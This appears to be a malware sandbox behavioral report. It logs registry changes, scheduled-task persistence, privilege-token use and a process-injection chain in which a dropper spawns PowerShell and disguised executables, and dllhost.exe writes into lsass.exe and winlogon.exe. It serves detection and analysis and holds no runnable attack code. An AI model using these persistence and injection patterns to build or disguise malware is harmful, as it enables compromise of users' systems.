Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d21b2596-66cf-41e1-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\59a630d9-56b2-454f- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\682dcb29-ad4b-4667-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\44ed5eaa-898a-4b05-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\05eb9cac-3265-4f6f-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\05eb9cac-3265-4f6f- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000007b18db9eb522db017b18db9eb522db017b18db9eb522db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000054594a302000383631366238646639663434393234643838306339626665326537613736613130656262656161366632363466663239303436393533346234346535663538640000b20009000400efbe54594a3054594a302e000000000000000000000000000000000000000000000000008525c400380036003100360062003800640066003900660034003400390032003400640038003800300063003900620066006500320065003700610037003600610031003000650062006200650061006100360066003200360034006600660032003900300034003600390035003300340062003400340065003500660035003800640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000210ca2c01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38363136623864663966343439323464383830633962666532653761373661313065626265616136663236346666323930343639353334623434653566353864000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075746b6265626c6f000000000000000050f199348f53f249b0bff96ed048476840f1537e9384ef1191c34e8e92b5429850f199348f53f249b0bff96ed048476840f1537e9384ef1191c34e8e92b54298ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900340030003900300031003300360032002d0033003600300038003800330033003100380039002d0031003900310035003600310038003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c4d65e62000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8beb6318-790e-4e61-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6009ba12-b7ae-4754- = ded2ef9eb522db01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\64acd353-61ec-4853- = 9f3513a0b522db01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\05eb9cac-3265-4f6f- = 39b6de9eb522db01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8beb6318-790e-4e61-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8beb6318-790e-4e61- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b73c9b00-f5b0-4472- = 726bff9eb522db01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b73c9b00-f5b0-4472- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002f2bee9eb522db012f2bee9eb522db012f2bee9eb522db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000054594a302000633561396338336265323834386336616631633135613432346138656535323431346133306430653839623364376435383064306165313033363265643365380000b20009000400efbe54594a3054594a302e00000000000000000000000000000000000000000000000000d112b100630035006100390063003800330062006500320038003400380063003600610066003100630031003500610034003200340061003800650065003500320034003100340061003300300064003000650038003900620033006400370064003500380030006400300061006500310030003300360032006500640033006500380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000210ca2c01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63356139633833626532383438633661663163313561343234613865653532343134613330643065383962336437643538306430616531303336326564336538000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075746b6265626c6f000000000000000050f199348f53f249b0bff96ed048476844f1537e9384ef1191c34e8e92b5429850f199348f53f249b0bff96ed048476844f1537e9384ef1191c34e8e92b54298ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900340030003900300031003300360032002d0033003600300038003800330033003100380039002d0031003900310035003600310038003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c4d65e62000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d21b2596-66cf-41e1-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\59a630d9-56b2-454f- = ce6dd59fb522db01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\59a630d9-56b2-454f-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\59a630d9-56b2-454f- = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\44ed5eaa-898a-4b05- = ce2e4da0b522db01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\31b2dd35-35d1-455d- = "\\\\?\\Volume{625ED6C4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4d67e0f04a7d761b22892986e3d5277accf76136f4107a5d305059b1bd6d6786"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d21b2596-66cf-41e1- = "\\\\?\\Volume{625ED6C4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4d67e0f04a7d761b22892986e3d5277accf76136f4107a5d305059b1bd6d6786"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\753d2eb8-bccc-4055-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\682dcb29-ad4b-4667- = "\\\\?\\Volume{625ED6C4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3facb2ea52ac8bee3a0898c74b3720c080f0118798648532443e63a4fcc95585"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\682dcb29-ad4b-4667- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000080fe629fb522db01bcba21a0b522db01bcba21a0b522db0134800b000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000054594a302000336661636232656135326163386265653361303839386337346233373230633038306630313138373938363438353332343433653633613466636339353538350000b20009000400efbe54594a3054594a302e000000000000000000000000000000000000000000000000007274b300330066006100630062003200650061003500320061006300380062006500650033006100300038003900380063003700340062003300370032003000630030003800300066003000310031003800370039003800360034003800350033003200340034003300650036003300610034006600630063003900350035003800350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000210ca2c01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33666163623265613532616338626565336130383938633734623337323063303830663031313837393836343835333234343365363361346663633935353835000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075746b6265626c6f000000000000000050f199348f53f249b0bff96ed04847684cf1537e9384ef1191c34e8e92b5429850f199348f53f249b0bff96ed04847684cf1537e9384ef1191c34e8e92b54298ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900340030003900300031003300360032002d0033003600300038003800330033003100380039002d0031003900310035003600310038003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c4d65e62000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\44ed5eaa-898a-4b05-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\44ed5eaa-898a-4b05- = "\\\\?\\Volume{625ED6C4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c5a9c83be2848c6af1c15a424a8ee52414a30d0e89b3d7d580d0ae10362ed3e8"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8beb6318-790e-4e61-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\05eb9cac-3265-4f6f- = "\\\\?\\Volume{625ED6C4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\8616b8df9f44924d880c9bfe2e7a76a10ebbeaa6f264ff290469534b44e5f58d"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d21b2596-66cf-41e1- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

3416 schtasks.exe
4692 schtasks.exe
1104 schtasks.exe

pid	process
3416	schtasks.exe
4692	schtasks.exe
1104	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5000	powershell.exe
5000	powershell.exe
2884	powershell.exe
2884	powershell.exe
3932	powershell.exe
3932	powershell.exe
2848	powershell.EXE
2848	powershell.EXE
2848	powershell.EXE
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
4932	powershell.exe
4932	powershell.exe
4932	powershell.exe
4804	powershell.exe
4804	powershell.exe
4804	powershell.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
1532	powershell.exe
1532	powershell.exe
2832	dllhost.exe
2832	dllhost.exe
1532	powershell.exe
2832	dllhost.exe
2832	dllhost.exe
3944	powershell.exe
3944	powershell.exe
2832	dllhost.exe
2832	dllhost.exe
3944	powershell.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe
2832	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeME77ZTVpfPe1.exepowershell.exewww.msedge.exepowershell.exepowershell.EXEdllhost.exepowershell.exeExplorer.EXEpowershell.exepowershell.exepowershell.exesvchost.exewww.MsEgeServ.comsvchost.exe

description	pid	process
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeDebugPrivilege	1392	ME77ZTVpfPe1.exe
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	4732	www.msedge.exe
Token: SeDebugPrivilege	3932	powershell.exe
Token: SeDebugPrivilege	2848	powershell.EXE
Token: SeDebugPrivilege	2848	powershell.EXE
Token: SeDebugPrivilege	2832	dllhost.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeShutdownPrivilege	3512	Explorer.EXE
Token: SeCreatePagefilePrivilege	3512	Explorer.EXE
Token: SeDebugPrivilege	4804	powershell.exe
Token: SeShutdownPrivilege	3512	Explorer.EXE
Token: SeCreatePagefilePrivilege	3512	Explorer.EXE
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeShutdownPrivilege	3512	Explorer.EXE
Token: SeCreatePagefilePrivilege	3512	Explorer.EXE
Token: SeDebugPrivilege	3944	powershell.exe
Token: SeShutdownPrivilege	3512	Explorer.EXE
Token: SeCreatePagefilePrivilege	3512	Explorer.EXE
Token: SeShutdownPrivilege	3512	Explorer.EXE
Token: SeCreatePagefilePrivilege	3512	Explorer.EXE
Token: SeAuditPrivilege	2820	svchost.exe
Token: SeDebugPrivilege	2232	www.MsEgeServ.com
Token: SeShutdownPrivilege	3512	Explorer.EXE
Token: SeCreatePagefilePrivilege	3512	Explorer.EXE
Token: SeShutdownPrivilege	3512	Explorer.EXE
Token: SeCreatePagefilePrivilege	3512	Explorer.EXE
Token: SeShutdownPrivilege	3512	Explorer.EXE
Token: SeCreatePagefilePrivilege	3512	Explorer.EXE
Token: SeShutdownPrivilege	3512	Explorer.EXE
Token: SeCreatePagefilePrivilege	3512	Explorer.EXE
Token: SeShutdownPrivilege	3512	Explorer.EXE
Token: SeCreatePagefilePrivilege	3512	Explorer.EXE
Token: SeShutdownPrivilege	3512	Explorer.EXE
Token: SeCreatePagefilePrivilege	3512	Explorer.EXE
Token: SeShutdownPrivilege	3512	Explorer.EXE
Token: SeCreatePagefilePrivilege	3512	Explorer.EXE
Token: SeShutdownPrivilege	3512	Explorer.EXE
Token: SeCreatePagefilePrivilege	3512	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	1120	svchost.exe
Token: SeIncreaseQuotaPrivilege	1120	svchost.exe
Token: SeSecurityPrivilege	1120	svchost.exe
Token: SeTakeOwnershipPrivilege	1120	svchost.exe
Token: SeLoadDriverPrivilege	1120	svchost.exe
Token: SeSystemtimePrivilege	1120	svchost.exe
Token: SeBackupPrivilege	1120	svchost.exe
Token: SeRestorePrivilege	1120	svchost.exe
Token: SeShutdownPrivilege	1120	svchost.exe
Token: SeSystemEnvironmentPrivilege	1120	svchost.exe
Token: SeUndockPrivilege	1120	svchost.exe
Token: SeManageVolumePrivilege	1120	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1120	svchost.exe
Token: SeIncreaseQuotaPrivilege	1120	svchost.exe
Token: SeSecurityPrivilege	1120	svchost.exe
Token: SeTakeOwnershipPrivilege	1120	svchost.exe
Token: SeLoadDriverPrivilege	1120	svchost.exe
Token: SeSystemtimePrivilege	1120	svchost.exe
Token: SeBackupPrivilege	1120	svchost.exe
Token: SeRestorePrivilege	1120	svchost.exe
Token: SeShutdownPrivilege	1120	svchost.exe
Token: SeSystemEnvironmentPrivilege	1120	svchost.exe
Token: SeUndockPrivilege	1120	svchost.exe
Token: SeManageVolumePrivilege	1120	svchost.exe

Suspicious use of UnmapMainImage 2 IoCs

Processes:

Explorer.EXERuntimeBroker.exe

pid process

3512 Explorer.EXE
3972 RuntimeBroker.exe

pid	process
3512	Explorer.EXE
3972	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ME77ZTVpfPe1.exePowershell.exewww.DeadSec0000000000-obfusecator.exepowershell.EXEdllhost.exewww.msedge.exelsass.exe

description	pid	process	target process
PID 1392 wrote to memory of 5000	1392	ME77ZTVpfPe1.exe	powershell.exe
PID 1392 wrote to memory of 5000	1392	ME77ZTVpfPe1.exe	powershell.exe
PID 1392 wrote to memory of 5000	1392	ME77ZTVpfPe1.exe	powershell.exe
PID 1392 wrote to memory of 4900	1392	ME77ZTVpfPe1.exe	Powershell.exe
PID 1392 wrote to memory of 4900	1392	ME77ZTVpfPe1.exe	Powershell.exe
PID 4900 wrote to memory of 2884	4900	Powershell.exe	powershell.exe
PID 4900 wrote to memory of 2884	4900	Powershell.exe	powershell.exe
PID 4900 wrote to memory of 3416	4900	Powershell.exe	schtasks.exe
PID 4900 wrote to memory of 3416	4900	Powershell.exe	schtasks.exe
PID 4900 wrote to memory of 4732	4900	Powershell.exe	www.msedge.exe
PID 4900 wrote to memory of 4732	4900	Powershell.exe	www.msedge.exe
PID 4900 wrote to memory of 3932	4900	Powershell.exe	powershell.exe
PID 4900 wrote to memory of 3932	4900	Powershell.exe	powershell.exe
PID 4900 wrote to memory of 4692	4900	Powershell.exe	schtasks.exe
PID 4900 wrote to memory of 4692	4900	Powershell.exe	schtasks.exe
PID 4900 wrote to memory of 3160	4900	Powershell.exe	www.DeadSec0000000000-obfusecator.exe
PID 4900 wrote to memory of 3160	4900	Powershell.exe	www.DeadSec0000000000-obfusecator.exe
PID 4900 wrote to memory of 3160	4900	Powershell.exe	www.DeadSec0000000000-obfusecator.exe
PID 3160 wrote to memory of 3228	3160	www.DeadSec0000000000-obfusecator.exe	REHQDPN.exe
PID 3160 wrote to memory of 3228	3160	www.DeadSec0000000000-obfusecator.exe	REHQDPN.exe
PID 3160 wrote to memory of 3228	3160	www.DeadSec0000000000-obfusecator.exe	REHQDPN.exe
PID 2848 wrote to memory of 2832	2848	powershell.EXE	dllhost.exe
PID 2848 wrote to memory of 2832	2848	powershell.EXE	dllhost.exe
PID 2848 wrote to memory of 2832	2848	powershell.EXE	dllhost.exe
PID 2848 wrote to memory of 2832	2848	powershell.EXE	dllhost.exe
PID 2848 wrote to memory of 2832	2848	powershell.EXE	dllhost.exe
PID 2848 wrote to memory of 2832	2848	powershell.EXE	dllhost.exe
PID 2848 wrote to memory of 2832	2848	powershell.EXE	dllhost.exe
PID 2848 wrote to memory of 2832	2848	powershell.EXE	dllhost.exe
PID 2832 wrote to memory of 596	2832	dllhost.exe	winlogon.exe
PID 2832 wrote to memory of 668	2832	dllhost.exe	lsass.exe
PID 2832 wrote to memory of 944	2832	dllhost.exe	svchost.exe
PID 2832 wrote to memory of 1012	2832	dllhost.exe	dwm.exe
PID 2832 wrote to memory of 528	2832	dllhost.exe	svchost.exe
